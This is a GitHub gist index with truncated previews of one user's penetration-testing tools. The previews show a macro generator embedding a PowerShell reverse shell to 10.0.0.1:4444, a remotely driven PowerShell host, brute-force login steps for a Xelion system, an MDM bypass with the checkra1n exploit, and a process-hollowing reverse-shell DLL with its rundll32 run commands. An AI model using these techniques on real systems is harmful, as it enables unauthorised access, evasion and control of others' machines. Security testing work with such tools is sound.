Frank Spierings FrankSpierings
@FrankSpierings
FrankSpierings / generate-xlsm-macro.py
Created Apr 30, 2021
Generate an XLSM macro from Python
View generate-xlsm-macro.py
import codecs
import base64
data = '''$lhost="10.0.0.1";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
@FrankSpierings
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
View pshost.cs
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
{
private static void Main(string[] args)
{
@FrankSpierings
FrankSpierings / ms-rsa-blob-to.py
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
View ms-rsa-blob-to.py
# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
@FrankSpierings
FrankSpierings / Brutus.java
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
View Brutus.java
/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/
@FrankSpierings
FrankSpierings / samlraider.py
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
View samlraider.py
import xml.dom.minidom as minidom
# Constants
COLLABORATOR = 'example.burpcollaborator.net'
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
@FrankSpierings
FrankSpierings / README.MD
Last active Apr 7, 2021
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit
View README.MD

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active Feb 9, 2021
Burp extension to minify a request's headers and parameters into another Repeater tab.
View request-minify.py
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
View burp-ntfs-ads-scan.py
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.
View cookie-authenticated-onedrive-enum.py